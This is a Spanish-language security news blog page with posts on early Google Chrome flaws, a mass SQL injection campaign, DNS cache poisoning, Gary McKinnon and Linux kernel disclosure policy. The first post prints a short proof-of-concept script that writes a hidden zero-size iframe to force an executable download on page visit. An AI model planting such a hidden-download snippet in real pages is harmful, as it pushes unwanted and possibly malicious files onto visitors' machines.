La Comunidad DragonJAR

El Nuevo Navegador de Google puede ser muy rápido, muy bonito, consumir poca memoria, tener muchas funciones “WoW” pero en estos 2 días ha demostrado que es muy inseguro hoy me entero gracias a un comentario de exactlimon sobre un nuevo fallo en Google Chrome que permite descargar archivos (de cualquier tipo) sin el consentimiento del usuario.

Este fallo descubierto nerex y publicado en milw0rm.com consiste simplemente en escribir el siguiente código JavaScript en un sitio malicioso y automáticamente al visitar este sitio se descargara la aplicación mencionada.

<script>
document.write('<iframe src="http://www.dragonjar.org/calc.exe" frameborder="0" width="0" height="0">');
</script>

He subido una prueba de concepto al servidor con la calculadora de windows y  haciendo click aquí obtendrás algo parecido a esto.

El archivo no se ejecuta, pero estoy seguro que con otro nombre e icono mas llamativos muchos lo abrirían solo por “curiosidad”, al parecer Google se ha dado cuenta de la cantidad de errores que tiene su navegador y ha dejado de promocionarlo en su pagina principal actualizado, han vuelto a promocionarlo en la pagina principal de google.

La version afectada con este y los otros fallos de seguridad mencionados anteriormente en el portal es la 0.2.149.27 les recomiendo que no utilicen este navegador al menos hasta que salga una nueva versión con estos problemas solucionados.

Mas Información:
http://milw0rm.com/exploits/6355
Primera Vulnerabilidad en Google Chrome
Nueva Vulnerabilidad en Google Chrome

Ayer les comentaba sobre la Primera Vulnerabilidad en Google Chrome, hoy Rishi Narang ha descubierto una nueva vulnerabilidad que permite bloquear TODAS las pestañas de el ya famoso Navegador de Google.

El fallo radica en la librería chrome.dll (versión 0.2.149.27) del navegador que permite bloquear todas las pestañas del Google Chrome mostrando el mensaje “!Vaya¡ Google Chrome ha fallado. ¿Deseas reiniciar?” con solo visitar un enlace en una pagina mal intencionada, pasando por alto la aclamada funcionalidad de “pestañas independientes” de este navegador (ver imagen). Leer el resto de la entrada »

No ha pasado ni 24 horas desde que google anuncio oficialmente su navegador “Google Chrome” y ya ha sido detectada la primera Vulnerabilidad en este.

Google Chrome es  vulnerable a “carpet bombing“, una vulnerabilidad descubierta por el investigador Aviv Raff en el motor web opensource  Webkit (Base del navegador Google Chrome y Safari) que permite descargar automáticamente archivos cuando el usuario navega por una página maliciosa. Leer el resto de la entrada »

Gran controversia a levantado la pequeña gimnasta olímpica He Kexin por el hecho de que según su pasaporte y la Fédération Internationale de Gymnastique (FIG) su fecha de nacimiento es Enero 1 de 1992 sin embargo algunas pequeñas investigaciones en Google podrían mostrar algo como Enero 1 de 1994.

La investigación se puede ver en algunos posts del blog de Stryde un consultor informático en defensa de la seguridad de la información.

Según Stryde si hacemos unas pequeñas búsquedas usando buscadores web podemos encontrar las discrepancias de fechas que han levantado está controversia.

Leer el resto de la entrada »

Un nuevo ataque de inyección de SQL ha venido circulando la semana pasada, y parece que ha infectado algunos cientos de servidores web en la tarde del viernes pasado. Los ataques se ven similares al que se muestra a continuación, e intentan consultar por archivos aleatorios validos en el servidor web.

Las tablas de sysobjects y syscolumns son consultadas y esto nos da una muy buena pista: las maquinas que se están atacando corren MSSQL, y se esta guardando código HTML dentro de la base de datos. También es posible que los servidores web con Sybase database backends sean explotables, ya que Sybase utiliza de manera muy amplia la misma sintaxis y estructura de las tablas que MSSQL server. Leer el resto de la entrada »

Un nuevo estudio de la universidad de Michigan ha encontrado que mas del 75% de los websites bancarios no precisamente lo mejor en cuanto a seguridad se refiere.

El estudio estuvo compuesto de 214 sitios web de instituciones financieras, y se enfoco en fallas de diseño y practicas de seguridad impropias. Ninguna de estas fallas representa cuestiones de seguridad catastróficas, sin embargo muchas ayudan a un acceso mucho más fácil a las contraseñas y los nombres de usuarios, que son una llamada atractiva para cualquier atacante. Leer el resto de la entrada »

Gary McKinnon, también llamado ‘Solo’, entro al mundo de la fama tras haber entrado a los computadores del pentágono en los Estados Unidos. Se estará enfrentando a una sentencia de pasar el resto de su vida en la cárcel por haber entrado en casi un centenar de computadores militares y de la NASA. Esto es muy grave, ya que todas sus intrusiones ocurrieron justo después de los atentados del 11S. Leer el resto de la entrada »

El creador de Metasploit, el popular framework de explotacion que fue el primero en incluir un modulo funcional de la ultima vulnerabilidad de DNS, ha sido victima de su propio invento.

Martes por la mañana, en la compañia de Moore (BreakingPoint), tuvo redirecciones de parte de su trafico a una pagina falsa de Google que habia puesto un scammer. Segun Moore, el hacker fue capaz de hacer esto ejecutando la vulnerabilidad de envenenamiento de cache en un servidor DNS en las redes de AT&T que estaba en ejecucion en Austin, Texas. Leer el resto de la entrada »

CERT ha anunciado un parche para múltiples implementaciones de DNS hoy, de manera masiva para muchas implementaciones diferentes. A principios de este año, el investigador Dan Kaminsky descubrió una vulnerabilidad básica en el protocolo DNS que ayudaría a los atacantes a comprometer cualquier servidor de nombres, incluyendo también a los clientes. Kaminsky ha venido trabajando en secreto con un grupo largo de vendedores en un parche coordinado. 81 vendedores han sido listados en la advisory de la CERT.

Esta disponible un podcast entrevistando a Dan Kaminsky y su sitio web contiene una herramienta de verificacion de DNS. Leer el resto de la entrada »

Hace una semana fue liberada la nueva versión del kernel de linux. En el correo anunciando su liberación se encuentra un pequeño resumen:

> It contains a number of assorted bugfixes all over the tree.  And once
> again, any users of the 2.6.25 kernel series are STRONGLY encouraged to
> upgrade to this release.

Lo curioso es que no mencionan muchos detalles acerca de la IMPORTANCIA de actualizar. Entre algunas respuestas al anuncio el equipo de PaX anuncio que dentro de los commits que se habían obviado mencionar se incluían una serie de correcciones al kernel que tenían alto impacto en la seguridad del mismo. (http://lwn.net/Articles/285438/, http://lwn.net/Articles/286263/, http://lwn.net/Articles/287339/, http://lwn.net/Articles/288473/)

En la misma discusión se cuestionaron las políticas de manejo de bugs “con impacto de seguridad” en los changelogs y demás notas de versiones, junto con otros aspectos de manejo de documentación al respecto. Esto llevo a que se hiciera hincapié en “la importancia de tener full/none/half/etc disclousures para los bugs que tengan relevancia en la seguridad”, con el siguiente párrafo:

so guys (meaning not only Greg but Andrew, Linus, et al.), when will you
publicly explain why you're covering up security impact of bugs? and even
more importantly, when will you change your policy or bring your process
in line with what you declared?

Luego, en un reply de Linus:

Security people are often the black-and-white kind of people that I can't
stand. I think the OpenBSD crowd is a bunch of masturbating monkeys, in
that they make such a big deal about concentrating on security to the
point where they pretty much admit that nothing else matters to them.

Y de hecho tiene muy buenas razones para haber dicho eso, ya que la industria de la seguridad informática se ha convertido en todo un teatro donde el que monte la mejor película es el que tiene la razón.

Linus dice que los bugs que tienen impacto en la seguridad son bugs normales, y tiene razón, técnicamente nadie diseña bugs en su software, y si tienes un bug probablemente no tengas la oportunidad de elegir si afecta o no en la integridad de la seguridad del kernel. Leer el resto de la entrada »